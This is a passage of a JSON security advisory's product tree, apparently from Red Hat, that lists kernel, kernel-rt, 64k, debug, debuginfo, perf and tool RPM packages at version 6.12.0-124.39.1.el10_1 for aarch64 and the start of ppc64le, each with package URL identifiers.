"name": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "rv-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "rv-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-aarch64@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-devel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-debug-modules-extra@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-devel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules-extra@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-extra@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-extra@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra-matched@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt-addons@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
